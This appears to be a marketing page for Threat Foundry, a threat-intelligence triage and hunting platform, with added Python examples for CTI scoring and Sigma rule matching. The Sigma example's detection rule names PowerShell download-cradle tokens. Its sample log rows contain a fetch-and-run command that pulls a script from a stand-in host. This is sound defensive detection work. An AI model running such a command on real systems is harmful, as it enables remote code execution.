CTI Automation for Hunt Operations

Auto Triage ranks the CTI. Analysts decide what deserves hunting.

Threat Foundry automates the CTI-to-hunt workflow: fresh intelligence is scored, grouped, mapped to ATT&CK and Sigma context, and reviewed before hunt time is spent. Analysts keep source context, promote credible threats into SIEM-ready hunt packages, inspect highlighted evidence, and route reviewed entities into triage and cases.

CTI Automation: Daily intelligence ranking, source context, relevance gates, and analyst review states.
Decide: Playbooks, coverage, and reporting context help choose what deserves a hunt.
Hunt: ATT&CK packages, attack paths, Sigma candidates, SIEM queries, and saved evidence.
Investigate: Entity analyzer, timeline, command graph, candidate ranking, triage, and cases.

Auto Triage

The critical workflow starts with ranked CTI.

Auto Triage is the front door of Threat Foundry. It scores newly ingested intelligence, promotes a configured number of top-ranked items from the current day's intake or the latest source update, and places each promoted item into a review queue before analysts spend hunt time. The quality gate separates Hunt Ready, Review First, Needs Triage, and Not Actionable work, so the output of CTI automation is a recorded analyst decision on each item rather than an unreviewed hunt.
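As an illustration of what a scoring-plus-gate step looks like in code, here is an added example; it is not Threat Foundry's implementation, and the weights, thresholds, four-state gate policy and the sample intake are assumptions chosen to show how a score becomes a review state with a recorded reason:

```python
"""Illustrative CTI ranking and quality gate (added example, not Threat Foundry
code). Each item carries a source reliability score, a relevance score, its
ATT&CK mapping, a count of hunt-usable observables, and whether telemetry and
Sigma coverage exist for the mapped techniques. The weights, thresholds and
the four-state gate policy are assumptions chosen to show how a score turns
into a review state with a recorded reason."""
from dataclasses import dataclass, field

HUNT_READY, REVIEW_FIRST = "Hunt Ready", "Review First"
NEEDS_TRIAGE, NOT_ACTIONABLE = "Needs Triage", "Not Actionable"

@dataclass
class CtiItem:
    title: str
    source: str
    source_reliability: float          # 0..1, maintained per feed by the team
    relevance: float                   # 0..1, e.g. sector and asset overlap from enrichment
    techniques: list = field(default_factory=list)   # ATT&CK technique IDs
    observables: int = 0               # IOCs, command lines, paths usable in a hunt
    telemetry_ready: bool = False      # required log sources are onboarded
    sigma_covered: bool = False        # existing Sigma rules cover the techniques

def score(item: CtiItem) -> float:
    """0..100 ranking score: 80 points for source and relevance, 20 for hunt inputs."""
    s = 40 * item.source_reliability + 40 * item.relevance
    s += 10 if item.techniques else 0
    s += 10 if item.observables else 0
    return round(s, 1)

def gate(item: CtiItem, min_relevance: float = 0.3) -> tuple:
    """Assign a review state and the reason for it, so the decision is auditable."""
    if item.relevance < min_relevance:
        return NOT_ACTIONABLE, f"relevance {item.relevance:.2f} below gate {min_relevance}"
    if not item.techniques and not item.observables:
        return NOT_ACTIONABLE, "no ATT&CK mapping and no hunt-usable observables"
    if not item.techniques:
        return NEEDS_TRIAGE, "observables present but no ATT&CK mapping yet"
    if not item.telemetry_ready:
        return REVIEW_FIRST, "mapped, but required telemetry is not onboarded"
    if not item.sigma_covered:
        return REVIEW_FIRST, "telemetry ready, but no Sigma coverage to compare against"
    return HUNT_READY, "mapped, telemetry ready, Sigma coverage exists"

def rank_and_gate(items, promote: int = 3):
    """Rank the day's intake, promote the top N, and gate each promoted item."""
    queue = []
    for it in sorted(items, key=score, reverse=True)[:promote]:
        state, reason = gate(it)
        queue.append({"title": it.title, "source": it.source, "score": score(it),
                      "state": state, "reason": reason})
    return queue

# Constructed sample intake for one day (assumed titles and sources).
SAMPLE_DAY = [
    CtiItem("Ransomware affiliate abuses rclone for exfiltration", "ISAC report",
            0.9, 0.8, ["T1567.002"], observables=3, telemetry_ready=True, sigma_covered=True),
    CtiItem("Phishing kit targeting finance teams", "vendor blog",
            0.7, 0.6, ["T1566.001"], observables=2),
    CtiItem("Partner IOC list, no context", "sharing group email",
            0.8, 0.5, observables=40),
    CtiItem("KEV entry for a product not in the asset inventory", "CISA KEV",
            1.0, 0.2, observables=1),
    CtiItem("Vendor post on APT naming conventions", "vendor blog",
            0.5, 0.1, ["T1059.001"]),
]

if __name__ == "__main__":
    for row in rank_and_gate(SAMPLE_DAY):
        print(f'{row["score"]:5.1f}  {row["state"]:15s} {row["title"]}  ({row["reason"]})')
```

The point of the reason string is the accountability the section describes: a Hunt Ready item carries a statement of why it passed, and a Not Actionable item can be audited later without re-deriving the score.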

Screenshot: CTI Quality Gate Queue with Hunt Ready, Review First, Needs Triage, and Not Actionable columns; review states are assigned before hunt generation.
Screenshot: Ranked Auto Triage queue of current-day source items with source links, context, and CTI intake actions.
Screenshot: Threat Foundry ransomware playbook with analyst goal and hunt steps; playbooks translate threat themes into hunt goals, TTPs, and analyst steps.

Review Context

Use playbooks and reports to decide what deserves hunting.

Before a hunt exists, analysts can compare CTI against playbooks, program metrics, Sigma coverage, exposure, telemetry readiness, and recent operational history. This keeps automation accountable to the team’s actual detection goals instead of turning every feed item into work.

Threat playbooks: Operational steps for ransomware, credential access, lateral movement, and impact scenarios.
Reports: Operational, executive, investigation, and program metric views for review and leadership context.
Coverage: Coverage cards reveal where detection depth already exists and where hunt work is needed.

Build Attack Paths

Turn approved TTPs into ordered hunt logic.

Attack Path Builder lets analysts seed a path from a threat actor or assemble techniques manually, then generate SIEM-ready hunt logic from the exact sequence. It supports staged thinking instead of one-off query generation.

  • Drag TTP cards into the investigation order analysts want to test.
  • Generate review-only tool queries or generic cross-tool recommendations.
  • Run combined searches only after explicit analyst approval.
Screenshot: Built attack path graph with ordered ATT&CK technique nodes, ready for review and query generation.

Sigma Evidence

See exactly why a Sigma rule triggered.

Triggered Sigma views connect detection logic to the returned SIEM rows. Threat Foundry highlights the exact matched fields and tokens, keeps the source row visible, and gives analysts a fast way to validate whether a rule match is meaningful evidence or expected activity.

  • Highlighted log lines show the Sigma field or token that matched.
  • Rule metadata, references, false positives, and ATT&CK context stay beside the evidence.
  • Analysts can move from triggered content into saved hunts, triage, and case handoff.
Screenshot: Triggered Sigma rule details with highlighted SIEM log-row matches; the exact matched fields and evidence rows are readable before analysts decide next steps.
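To make the matched-field idea concrete, here is an added example (not Threat Foundry's code) of a minimal Sigma-style matcher that returns the exact field and token behind each hit and renders the highlighted row. The rule follows the public Sigma detection format but is constructed, as are the known-good parent filter and the SIEM rows; only the exact, contains, startswith and endswith modifiers and the `selection` / `selection and not filter` conditions are handled.

```python
"""Sigma-style matcher that reports the exact field and token behind a hit.
Added example, not Threat Foundry's implementation; the rule (public Sigma
detection format) and the SIEM rows are constructed. Supported: exact,
'contains', 'startswith', 'endswith', list values (OR in a field, AND across
fields), conditions 'selection' and 'selection and not filter'. Regex, 'all'
and the rest of the spec are out of scope."""

RULE = {
    "title": "PowerShell Download Cradle",
    "tags": ["attack.execution", "attack.t1059.001"],
    "falsepositives": ["Admin tooling that legitimately fetches installers"],
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["downloadstring", "invoke-webrequest", "-enc "],
        },
        # Assumed known-good parent; real filters come from tuning, not guesses.
        "filter": {"ParentImage|endswith": "\\sccm-agent.exe"},
        "condition": "selection and not filter",
    },
}

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
ROWS = [  # constructed Sysmon-style process creation rows
    {"Host": "ws-042", "User": "CORP\\jdoe", "Image": PS,
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a.ps1')"},
    {"Host": "srv-db1", "User": "CORP\\svc_sccm", "Image": PS,
     "ParentImage": "C:\\Program Files\\SCCM\\sccm-agent.exe",
     "CommandLine": "powershell.exe -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"Host": "ws-017", "User": "CORP\\asmith", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe /c dir"},
]

def match_field(key, wanted, row):
    """One 'Field|modifier' entry; returns (field, token, start, end) per matching token."""
    field, _, modifier = key.partition("|")
    if row.get(field) is None:
        return []
    haystack = str(row[field]).lower()  # Sigma string matching is case-insensitive
    hits = []
    for token in (wanted if isinstance(wanted, list) else [wanted]):
        needle = str(token).lower()
        if modifier == "contains":
            start = haystack.find(needle)
        elif modifier == "startswith":
            start = 0 if haystack.startswith(needle) else -1
        elif modifier == "endswith":
            start = len(haystack) - len(needle) if haystack.endswith(needle) else -1
        elif modifier == "":
            start = 0 if haystack == needle else -1
        else:
            raise ValueError(f"unsupported modifier: {modifier}")
        if start >= 0:
            hits.append((field, token, start, start + len(needle)))
    return hits

def match_block(block, row):
    """AND across the fields of a selection/filter block; None if any field fails."""
    hits = []
    for key, wanted in block.items():
        field_hits = match_field(key, wanted, row)
        if not field_hits:
            return None
        hits.extend(field_hits)
    return hits

def evaluate(rule, row):
    """Matched spans for a row, or [] when the rule does not fire."""
    det = rule["detection"]
    if det["condition"] not in ("selection", "selection and not filter"):
        raise ValueError(f"unsupported condition: {det['condition']}")
    hits = match_block(det["selection"], row)
    if hits and det["condition"].endswith("not filter") and match_block(det["filter"], row):
        return []  # selection hit, but the tuning filter excludes it
    return hits or []

def highlight(row, hits):
    """Wrap each matched span in [[ ]] so the source row stays readable."""
    spans = {}
    for field, _token, start, end in hits:
        spans.setdefault(field, []).append((start, end))
    out = {}
    for field, ranges in spans.items():
        text = str(row[field])
        for start, end in sorted(ranges, reverse=True):  # right-to-left keeps offsets valid
            text = text[:start] + "[[" + text[start:end] + "]]" + text[end:]
        out[field] = text
    return out

def triggered(rule, rows):
    """Triggered view: per matching row, the hits, the highlighted fields and rule context."""
    view = []
    for idx, row in enumerate(rows):
        hits = evaluate(rule, row)
        if hits:
            view.append({"row": idx, "host": row.get("Host"), "user": row.get("User"),
                         "matched": [(f, t) for f, t, _, _ in hits],
                         "highlighted": highlight(row, hits),
                         "tags": rule["tags"], "falsepositives": rule["falsepositives"]})
    return view
```

Run against the constructed rows, only the first row is returned: the second matches the selection but is excluded by the parent-process filter, and the third never matches the Image field. The returned entry keeps the rule's tags and false-positive notes next to the highlighted `DownloadString` token, which is the context an analyst needs to judge whether the match is evidence or expected activity.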

Saved Hunt Review

Review the hunt package before triage.

Saved hunts preserve source context, confidence, generated query references, rerun history, entity coverage, and enrichment actions. Triage happens after review, when a human has seen the evidence and decided it deserves follow-through.

Screenshot: Known-good PowerShell saved hunt review package with confidence, enrichment, export, and triage controls; review first, then triage if warranted.
Screenshot: Threat Foundry Entity Analyzer showing accounts, hosts, processes, and evidence pivots; returned rows become grouped investigation entities, relationships, and pivots.

Entity Analyzer

Move from SIEM rows to investigation shape.

Entity Analyzer turns returned hunt results into a practical investigation surface. Analysts can see which accounts, hosts, processes, commands, and related observables recur across the evidence, then pivot without losing the original hunt context.

  • Returned fields are normalized into analyst-friendly entity groups.
  • Entity pivots keep follow-on hunts grounded in reviewed evidence.
  • Candidate ranking highlights the accounts, hosts, commands, and processes worth pursuing.

Govern the Workflow

Wire the platforms in without hardcoding the process.

Configuration covers query platforms, vendor integrations, field normalization, assets, baselines, API Connect, source refresh behavior, model settings, and audit trails. The product can start in the lab and grow into live SOC wiring.

Integrations: SIEM, EDR, vulnerability scanners, CTI feeds, identity, SOAR, and ticketing handoff.
Policy: Query limits, source controls, field mapping, data caps, and telemetry readiness.
Audit: SOAR/API requests, AI usage, triage history, saved-hunt notes, and report outputs.
Screenshot: Threat Foundry configuration and integrations page; governance and integration settings keep automation aligned to the SOC.

Platform Flow

Fresh intelligence becomes reviewed action.

1. Auto Triage: CTI feeds, emailed threats, reports, KEVs, EDR alerts, and vulnerability context enter a ranked daily review queue.
2. Review context: Analysts check source detail, playbooks, reports, coverage, and evidence before spending hunt time.
3. Generate hunts: Approved CTI becomes ATT&CK hunt packages, attack paths, Sigma candidates, and saved evidence.
4. Investigate and route: Timelines, entity graphs, candidates, triage, cases, reporting, and tickets close the loop.

Deployment

Built for teams wiring real platforms into accountable hunt operations.

Threat Foundry can start with generic hunts and grow into live SIEM, CTI, EDR, vulnerability management, Sigma, SOAR, and ticketing integrations.
